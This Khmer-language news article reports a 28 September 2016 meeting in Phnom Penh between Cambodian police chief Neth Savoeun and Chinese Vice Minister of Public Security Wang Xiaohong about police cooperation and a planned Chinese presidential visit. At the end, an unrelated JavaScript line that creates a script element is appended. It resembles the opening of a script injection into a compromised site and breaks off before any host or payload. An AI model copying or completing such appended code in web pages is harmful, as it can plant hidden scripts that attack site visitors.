អគ្គស្នងការនគរបាលជាតិជួបពិភាក្សាការងារជាមួយអនុរដ្ឋមន្ត្រីក្រសួងសន្តិសុខសាធារណៈចិន
ភ្នំពេញ ៖ នាព្រឹកថ្ងៃទី២៨ ខែកញ្ញា ឆ្នាំ២០១៦នេះ នៅអគ្គស្នងការដ្ឋាននគរបាលជាតិ ឯកឧត្តម នាយឧត្តមសេនីយ៍ នេត សាវឿន អគ្គស្នងការនគរបាលជាតិ បានជួបពិភាក្សាការងារ ដើម្បីរឹត ចំណងមិត្តភាព កិច្ចសហប្រតិបត្តិការជាមួយ ឯកឧត្តម វ៉ាង សៀហុង (Wang Xiaohong) អនុរដ្ឋមន្ត្រីក្រសួងសន្តិសុខសាធារណៈ និងជាស្នងការ នគរបាលទីក្រុងប៉េកាំង នៃសាធារណរដ្ឋប្រជាមានិតចិន។
ជាកិច្ចចាប់ផ្តើម ឯកឧត្តម នាយឧត្តមសេនីយ៍ នេត សាវឿន អគ្គស្នងការ នគរបាលជាតិ បានលើកឡើងប្រាប់ ឯកឧត្តម វ៉ាង សៀហុង ថា ទំនាក់ ទំនង និងកិច្ចសហប្រតិបត្តិការរវាងព្រះរាជាណាចក្រកម្ពុជា និងសាធារណរដ្ឋប្រជាមានិតចិន នាពេលកន្លងមកក៏ដូចជាពេល បច្ចុប្បន្ននេះមានលក្ខណៈប្រសើរ ហើយជាពិសេសទៀតនោះ គឺទំនាក់ទំនងរវាងអគ្គស្នងការដ្ឋាននគរបាលជាតិកម្ពុជា និងក្រសួង សន្តិសុខសាធារណៈចិន គឺមានទំនាក់ទំនង និងកិច្ចសហប្រតិបត្តិការ ល្អប្រសើរជាមួយ។
ឯកឧត្តម នាយឧត្តមសេនីយ៍ នេត សាវឿន អគ្គស្នងការនគរបាលជាតិ ក៏បានថ្លែងអំណរគុណដល់ក្រសួងសន្តិសុខសាធារណៈចិន ដែលកន្លង មកបានជួយដល់នគរបាលកម្ពុជា ទាំងសម្ភារ ស្មារតី និងការបណ្តុះ បណ្តាលផងដែរ។
ជាការឆ្លើយតប ឯកឧត្តម វ៉ាង សៀហុង អនុរដ្ឋមន្ត្រីក្រសួងសន្តិសុខ សាធារណៈ និងជាស្នងការនគរបាលទីក្រុងប៉េកាំង បានថ្លែងអំណរគុណ ចំពោះគណៈប្រតិភូកម្ពុជាដែលបានទទួលស្វាគមន៍ចំពោះឯកឧត្តមហើយបានទទួលស្គាល់ចំពោះការលើកឡើងរបស់ឯកឧត្តម នាយឧត្តមសេនីយ៍ នេត សាវឿន ពីទំនាក់ទំនងកម្ពុជានិងចិន ដែលមានជាយូរណាស់មក ហើយ ហើយចិននៅតែរក្សានូវទំនាក់ទំនងល្អនេះជារៀងរហូត។
ឯកឧត្តម វ៉ាង សៀហុង បានបញ្ជាក់ពីគោលបំណងថាកាល ដែលឯកឧត្តម មកកម្ពុជានាពេលនេះគឺដើម្បីពិភាក្សាជាមួយនឹងស្ថាប័នពាក់ព័ន្ធកម្ពុជាដើម្បីរៀបចំទទួលដំណើរទស្សនកិច្ចឯកឧត្តមប្រធានាធិបតីចិន ដែលនឹងអញ្ជើញមកទស្សនកិច្ចនៅព្រះរាជាណាចក្រកម្ពុជា នៅខែតុលា ឆ្នាំ២០១៦ ខាងមុខនេះ និងគោលបំណងមួយទៀតគឺ មកជម្រុញពី ទំនាក់ទំនង និងកិច្ចសហប្រតិបត្តិការល្អរវាងប្រទេសទាំងពីរ។
ឯកឧត្តម នាយឧត្តមសេនីយ៍ នេត សាវឿន បានជម្រាបជូនថា ឯកឧត្តម បានទទួលដំណឹងពីដំណើរទស្សនកិច្ចនេះហើយៗឯកឧត្តមក៏បានណែនាំទៅដល់ស្ថាប័នពាក់ព័ន្ធទាំងអស់ត្រូវសហការគ្នាធ្វើយ៉ាងណាឲ្យទស្សនកិច្ចនេះទទួលបានជោគជ័យ ៕
var d=document;var s=d.createElement(‘script’);